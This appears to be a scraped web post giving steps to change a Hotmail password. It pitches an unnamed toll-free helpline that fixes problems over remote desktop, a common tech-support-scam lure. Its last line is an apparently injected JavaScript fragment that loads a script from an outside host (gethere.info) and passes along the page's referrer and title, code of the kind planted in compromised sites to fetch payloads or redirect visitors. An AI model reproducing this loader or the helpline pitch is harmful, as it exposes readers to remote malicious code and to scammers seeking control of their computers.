Hotmail administration allows users to change and update their account password as many times as they want.
How to change Hotmail account password
· In your desktop browser, browse the Hotmail Sign in page. Now sign into your account with your ID and password.
· In your inbox page find the profile image in the upper-right corner and click on it.
· In the account section select the “Account settings” option and then click on “Security and password” option in there.
· Now you will may asked to verify your account with the accurate credentials. Verify our account accordingly.
· Now find and click on the “Change password” option.
· Type in your current password and then type in a new password for your account in the appropriate boxes as given. Click “save changes” to save the new changes.
· Now in a new tab sign into your account with the new password to make sure that change has been made to your account.
Hotmail customer service
You can get help with password change process from the expert advisers available from the customer service helpdesk. The experts can be reached through the toll free helpline number and will give you best and quick resolution for your password change errors through remote desktop facility.
original post by https://www.prlog.org/12571792-change-your-hotmail-account-password-instantly-to-keep-it-protected-from-unwanted-uses.html at Internet – Latest News
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;